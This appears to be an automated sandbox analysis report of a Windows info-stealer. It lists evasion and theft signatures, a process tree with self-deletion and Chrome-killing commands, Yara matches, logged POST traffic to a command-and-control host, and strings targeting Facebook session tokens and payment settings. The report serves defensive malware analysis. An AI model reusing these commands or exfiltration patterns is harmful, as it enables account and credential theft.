Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Cyfj6XGbkd

Overview

General Information

Sample Name:Cyfj6XGbkd (renamed file extension from none to exe)
Analysis ID:346134
MD5:63204eb716c856723a010747d58a6b00
SHA1:7e97f00b4c3580cedee02c448ac9aeb54afefbd2
SHA256:6d2db66a98ec5730bdcbc41dc7c78210fe24fe48bf7e44b59ab01c2084900456

Most interesting Screenshot:

Detection

Score:93
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (creates a PE file in dynamic memory)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to detect sleep reduction / modifications
Contains functionality to infect the boot sector
Hides threads from debuggers
Installs new ROOT certificates
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file has a writeable .text section
Registers a new ROOT certificate
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Checks for available system drives (often done to infect USB drives)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read device registry values (via SetupAPI)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Installs a Chrome extension
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains strange resources
Queries device information via Setup API
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara signature match

Classification

Startup

  • System is w10x64
  • Cyfj6XGbkd.exe (PID: 1676 cmdline: 'C:\Users\user\Desktop\Cyfj6XGbkd.exe' MD5: 63204EB716C856723A010747D58A6B00)
    • msiexec.exe (PID: 4828 cmdline: msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi' MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
    • 56BB1610C0318054.exe (PID: 476 cmdline: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe 0011 user01 MD5: 63204EB716C856723A010747D58A6B00)
      • 1611970637183.exe (PID: 6028 cmdline: 'C:\Users\user\AppData\Roaming\1611970637183.exe' /sjson 'C:\Users\user\AppData\Roaming\1611970637183.txt' MD5: EF6F72358CB02551CAEBE720FBC55F95)
      • ThunderFW.exe (PID: 7156 cmdline: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe' MD5: F0372FF8A6148498B19E04203DBB9E69)
      • cmd.exe (PID: 6236 cmdline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • PING.EXE (PID: 4248 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)
    • 56BB1610C0318054.exe (PID: 576 cmdline: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe 200 user01 MD5: 63204EB716C856723A010747D58A6B00)
      • cmd.exe (PID: 6012 cmdline: cmd.exe /c taskkill /f /im chrome.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 1972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • taskkill.exe (PID: 5740 cmdline: taskkill /f /im chrome.exe MD5: 15E2E0ACD891510C6268CB8899F2A1A1)
      • cmd.exe (PID: 6752 cmdline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • PING.EXE (PID: 6624 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)
    • cmd.exe (PID: 6336 cmdline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\Cyfj6XGbkd.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 4328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • PING.EXE (PID: 6452 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)
  • msiexec.exe (PID: 4584 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding C6BE2003C858D11BE040843C2C46EAA2 C MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.366076006.00000000025E0000.00000040.00000001.sdmpPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
00000002.00000002.413908813.0000000002810000.00000040.00000001.sdmpPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
00000004.00000002.378006718.0000000002560000.00000040.00000001.sdmpPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n

Unpacked PEs

SourceRuleDescriptionAuthorStrings
0.2.Cyfj6XGbkd.exe.25e0000.5.raw.unpackPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
4.2.56BB1610C0318054.exe.2560000.3.unpackPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
2.2.56BB1610C0318054.exe.10000000.7.unpackPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
2.2.56BB1610C0318054.exe.2810000.5.raw.unpackPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
0.2.Cyfj6XGbkd.exe.10000000.6.unpackPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
Click to see the 7 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeMetadefender: Detection: 24%Perma Link
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeReversingLabs: Detection: 58%
Multi AV Scanner detection for submitted fileShow sources
Source: Cyfj6XGbkd.exeVirustotal: Detection: 40%Perma Link
Source: Cyfj6XGbkd.exeMetadefender: Detection: 24%Perma Link
Source: Cyfj6XGbkd.exeReversingLabs: Detection: 58%
Machine Learning detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeJoe Sandbox ML: detected
Machine Learning detection for sampleShow sources
Source: Cyfj6XGbkd.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_1001F720 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext,0_2_1001F720
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_1001F720 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext,2_2_1001F720

Compliance:

barindex
Detected unpacking (creates a PE file in dynamic memory)Show sources
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeUnpacked PE file: 2.2.56BB1610C0318054.exe.2810000.5.unpack
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeUnpacked PE file: 4.2.56BB1610C0318054.exe.2560000.3.unpack
Uses 32bit PE filesShow sources
Source: Cyfj6XGbkd.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Uses new MSVCR DllsShow sources
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile opened: C:\Users\user\AppData\Local\Temp\download\msvcr71.dllJump to behavior
Binary contains paths to debug symbolsShow sources
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdb source: MiniThunderPlatform.exe.2.dr
Source: Binary string: c:\Projects\VS2005\EdgeCookiesView\Release\EdgeCookiesView.pdb source: 1611970637183.exe, 00000009.00000000.372796373.000000000040F000.00000002.00020000.sdmp, 1611970637183.exe.2.dr
Source: Binary string: atl71.pdbT source: atl71.dll.2.dr
Source: Binary string: msvcr71.pdb\ source: msvcr71.dll.2.dr
Source: Binary string: cmd_insert_server.icex-conference/x-cooltalk.movievideo/x-sgi-movievideo/x-msvideo.mxuvideo/vnd.mpegurl.qtvideo/quicktimevideo/mpeg.xmltext/xml.etxtext/x-setext.wmlstext/vnd.wap.wmlscript.wmltext/vnd.wap.wml.tsvtext/tab-separated-values.sgmtext/sgml.rtftext/rtf.rtxtext/richtext.txttext/plain.html.csstext/css.mshmodel/mesh.igsmodel/iges.xwdimage/x-xwindowdump.xpmimage/x-xpixmap.xbmimage/x-xbitmap.rgbimage/x-rgb.ppmimage/x-portable-pixmap.bgmimage/x-portable-graymap.pbmimage/x-portable-bitmap.pnmimage/x-portable-anymap.rasimage/x-cmu-raster.wbmpimage/vnd.wap.wbmp.djvimage/vnd.djvu.tiffimage/tiff.pngimage/png.jpgimage/jpeg.iefimage/ief.gifimage/gif.bmpimage/bmp.xyzchemical/x-xyz.pdbchemical/x-pdb.wavaudio/x-wavaudio/x-realaudio.arpmaudio/x-pn-realaudio-pluginaudio/x-pn-realaudio.m3uaudio/x-mpegurl.aifaudio/x-aiffaudio/mpeg.midiaudio/midiapplication/application/zip.xhtmlapplication/xhtml+xml.srcapplication/x-wais-source.ustarapplication/x-ustar.msapplication/x-troff-ms.meapplication/x-troff-me.manapplication/x-troff-man.texiapplication/x-texinfo.texapplication/x-tex.tclapplication/x-tclapplication/x-tar.sv4crcapplication/x-sv4crc.sv4cpioapplication/x-sv4cpio.sitapplication/x-stuffit.swfapplication/x-shockwave-flash.sharapplication/x-shar.shapplication/x-sh.latexapplication/x-latex.jsapplication/x-javascript.hdfapplication/x-hdf.gtarapplication/x-gtar.splapplication/x-futuresplash.dviapplication/x-dvi.cshapplication/x-csh.cpioapplication/x-cpio.pgnapplication/x-chess-pgn.vcdapplication/x-cdlink.bcpioapplication/x-bcpio.wmlscapplication/vnd.wap.wmlscriptc.wmlcapplication/vnd.wap.wmlc.wbxmlapplication/vnd.wap.wbxml.pptapplication/vnd.ms-powerpoint.xlsapplication/vnd.ms-excel.mifapplication/vnd.mif.smiapplication/smil.pdfapplication/pdf.odaapplication/oda.docapplication/msword.cptapplication/mac-compactpro.hqxapplication/mac-binhex40.ezapplication/andrew-inset source: download_user.dll.2.dr
Source: Binary string: d:\MiniDownloadLib\branches\bin\Product Release\download_user.pdb source: download_user.dll.2.dr
Source: Binary string: atl71.pdb source: atl71.dll.2.dr
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdbpJ source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdbt source: MiniThunderPlatform.exe.2.dr
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\xldl.pdb source: xldl.dll.2.dr
Source: Binary string: msvcp71.pdb source: msvcp71.dll.2.dr
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb0 source: dl_peer_id.dll.2.dr
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdb source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp
Source: Binary string: d:\workspace\xlframework\win32_component\ThunderFW\Release\ThunderFW.pdb source: ThunderFW.exe, 00000012.00000000.397410202.000000000099C000.00000002.00020000.sdmp, ThunderFW.exe.2.dr
Source: Binary string: f:\sys\objfre_win7_amd64\amd64\FsFilter64.pdb source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb source: dl_peer_id.dll.2.dr
Source: Binary string: msvcr71.pdb source: msvcr71.dll.2.dr
Source: Binary string: d:\BranchAI\launcher\Release\fileLauncher.pdb source: MSIDCDD.tmp.1.dr
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: z:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: x:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: v:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: t:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: r:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: p:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: n:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: l:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: j:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: h:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: f:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: b:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: y:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: w:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: u:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: s:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: q:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: o:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: m:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: k:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: i:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: g:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: e:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: c:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: a:Jump to behavior
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_1001A170 FindFirstFileA,FindClose,0_2_1001A170
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_1001A170 FindFirstFileA,FindClose,2_2_1001A170
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior

Networking:

barindex
Uses ping.exe to check the status of other devices and networksShow sources
Source: unknownProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: global trafficHTTP traffic detected: GET /info_old/ddd HTTP/1.1Host: 84CFBA021A5A6662.xyzAccept: */*
Source: global trafficHTTP traffic detected: POST //fine/send HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 82Host: 84cfba021a5a6662.xyz
Source: global trafficHTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
Source: global trafficHTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
Source: global trafficHTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
Source: global trafficHTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
Source: global trafficHTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
Source: global trafficHTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
Source: global trafficHTTP traffic detected: POST /info_old/e HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 677Host: 84cfba021a5a6662.xyz
Source: global trafficHTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
Source: global trafficHTTP traffic detected: POST /info_old/g HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 1393Host: 84cfba021a5a6662.xyz
Source: global trafficHTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
Source: global trafficHTTP traffic detected: GET /info_old/r HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Host: 84cfba021a5a6662.xyz
Source: global trafficHTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyz
Source: global trafficHTTP traffic detected: GET /info_old/r HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Host: 84cfba021a5a6662.xyz
Source: global trafficHTTP traffic detected: GET /info_old/ddd HTTP/1.1Host: 84CFBA021A5A6662.xyzAccept: */*
Source: 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: "name":"fb_dtsg","value":"name="fb_dtsg" value="Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: nonehttps://www.facebook.com/""2%d0https://graph.facebook.com/me/friends?access_token=%s&pretty=1&limit=1summarytotal_count{}summarytotal_count%dquery_friends.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: count = %d equals www.facebook.com (Facebook)
Source: Cyfj6XGbkd.exeString found in binary or memory: &AboutZwww.VB-CABLE.com web site[News are on Facebook ! equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: -3https://www.facebook.com/payments/settings/payment_methods/index.php?__a=1errorSummaryconfirmemail.phpcard_type_name-110query_payment2.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: ret = %s equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exeString found in binary or memory: _time":"13245952903455635","lastpingday":"13245947457776957","location":1,"manifest":{"app":{"launch":{"container":"tab","web_url":"http://www.youtube.com"},"web_content":{"enabled":true,"origin":"http://www.youtube.com"}},"current_locale":"en","default_locale equals www.youtube.com (Youtube)
Source: 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: same-originreferer: https://www.messenger.com/origin: https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie: c_user=ookie: xs=ookie: ;%[^;]; https://m.facebook.com/settings/email/<span class="_52ji _8uk3">accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1</span></span>@&#064;@&#064;https://m.facebook.com/settings/sms/<strong><span dir="ltr">accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1</span></span>+ https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_point"dtsg":{"token":"accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1"https://m.facebook.com/pages/create/edit_name/"draftID":Accept: */*Origin: https://m.facebook.comReferer: https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_pointSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originX-Requested-With: XMLHttpRequestX-Response-Format: JSONStreampage_name=&m_sess=&fb_dtsg=&jazoest=&__csr=&__req=3&__user=,"https://m.facebook.com/pages/creation_flow/?step=category&draft_id=&cat_ref_page_id=0&extra_data=%7B%22page_name%22%3A%22%22%7D"dtsg":{"token":"accept: 